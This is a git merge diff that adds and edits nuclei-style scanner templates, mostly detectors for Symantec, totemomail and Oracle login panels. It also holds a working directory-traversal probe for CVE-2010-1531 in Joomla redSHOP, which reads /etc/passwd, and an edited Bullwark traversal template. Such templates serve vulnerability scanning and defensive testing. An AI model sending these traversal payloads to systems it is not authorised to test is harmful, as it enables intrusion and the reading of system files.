Merge branch 'master' into tech-clean

cves/2010/CVE-2010-1531.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1531
+
+info:
+  name: Joomla! Component redSHOP 1.0 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/12054
+    - https://www.cvedetails.com/cve/CVE-2010-1531
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

exposed-panels/symantec/symantec-dlp-login.yaml

@@ -0,0 +1,24 @@
+id: symantec-dlp-login
+
+info:
+  name: Symantec Data Loss Prevention
+  author: princechaddha
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22
+  tags: symantec,panel,login
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ProtectManager/Logon'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Symantec Data Loss Prevention</title>"
+        part: body
+
+      - type: status
+        status:
+          - 200

exposed-panels/symantec/symantec-epm-login.yaml

@@ -0,0 +1,24 @@
+id: symantec-epm-login
+
+info:
+  name: Symantec Endpoint Protection Manager
+  author: princechaddha
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22
+  tags: symantec,panel,login
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Symantec Endpoint Protection Manager</title>"
+        part: body
+
+      - type: status
+        status:
+          - 200

exposed-panels/symantec/symantec-ewep-login.yaml

@@ -0,0 +1,24 @@
+id: symantec-ewep-login
+
+info:
+  name: Symantec Encryption Web Email Protection
+  author: johnk3r
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22
+  tags: panel,symantec,login
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/b/l.e"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<TITLE>Symantec Encryption Server: Web Email Protection - Login</TITLE>"
+        part: body
+
+      - type: status
+        status:
+          - 200

exposed-panels/symantec/symantec-pgp-global-directory.yaml

@@ -0,0 +1,24 @@
+id: symantec-pgp-global-directory
+
+info:
+  name: Symantec PGP Global Directory
+  author: princechaddha
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22
+  tags: symantec,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/vkd/GetWelcomeScreen.event'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<TITLE>PGP Global Directory</TITLE>"
+        part: body
+
+      - type: status
+        status:
+          - 200

exposed-panels/totemomail-detect.yaml

@@ -0,0 +1,23 @@
+id: totemomail-detect
+
+info:
+  name: Detect totemomail - Secure email communication
+  author: johnk3r
+  severity: info
+  tags: totemomail,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/responsiveUI/webmail/folder.xhtml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>WebMail login: totemomail® WebMail</title>"
+        part: body
+
+      - type: status
+        status:
+          - 200

network/totemomail-smtp-detect.yaml

@@ -0,0 +1,21 @@
+id: totemomail-smtp-detect
+
+info:
+  name: Totemomail SMTP Server Detect
+  author: princechaddha
+  severity: info
+  tags: mail,smtp,network,totemomail
+
+network:
+  - inputs:
+      - data: "\r\n"
+    read-size: 2048
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:25"
+
+    matchers:
+      - type: word
+        words:
+          - "totemomail"

technologies/oracle/default-oracle-application-page.yaml

@@ -4,13 +4,14 @@ info:
   name: Oracle Application Server Containers
   author: dhiyaneshDk
   severity: info
-  tags: tech,oracle
   reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22
+  tags: tech,oracle
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:

technologies/oracle/oracle-dbass-detect.yaml

@@ -0,0 +1,21 @@
+id: oracle-dbass-detect
+info:
+  name: Oracle DBaaS Monitor Detect
+  author: pussycat0x
+  severity: info
+  tags: oracle,tech
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dbaas_monitor/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>DBaaS Monitor</title>'
+
+      - type: status
+        status:
+          - 200

technologies/oracle/oracle-dbcs.yaml

@@ -0,0 +1,23 @@
+id: oracle-dbcs
+info:
+  name: Oracle Database as a Service
+  author: pussycat0x
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22
+  tags: oracle,tech
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Oracle Database as a Service</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200

technologies/oracle/oracle-iplanet-web-server.yaml

@@ -1,25 +1,26 @@
-id: oracle-iplanet-web-server
-
-info:
-  name: Detect Oracle-iPlanet-Web-Server
-  author: pussycat0x
-  severity: info
-  tags: tech,oracle
-  additional-fields:
-    fofa-dork: 'app="Oracle-iPlanet-Web-Server'
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "Oracle iPlanet Web Server"
-
-      - type: status
-        status:
-          - 200
+id: oracle-iplanet-web-server
+
+info:
+  name: Detect Oracle-iPlanet-Web-Server
+  author: pussycat0x
+  severity: info
+  tags: tech,oracle
+  additional-fields:
+    fofa-dork: 'app="Oracle-iPlanet-Web-Server'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+
+        part: body
+        words:
+          - "Oracle iPlanet Web Server"
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/bullwark-momentum-lfi.yaml

@@ -4,16 +4,15 @@ info:
   name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
   author: pikpikcu
   severity: high
-  tags: bullwark,lfi
   reference:
     - https://www.exploit-db.com/exploits/47773
     - http://www.bullwark.net/ # vendor homepage
     - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
-
   additional-fields:
     version: Bullwark Momentum Series Web Server JAWS/1.0
     shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1
     fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
+  tags: bullwark,lfi
 
 requests:
   - raw:
@@ -29,6 +28,6 @@ requests:
         status:
           - 200
 
-      - type: word
-        words:
-          - "root:"
+      - type: regex
+        regex:
+          - "root:.*:0:0"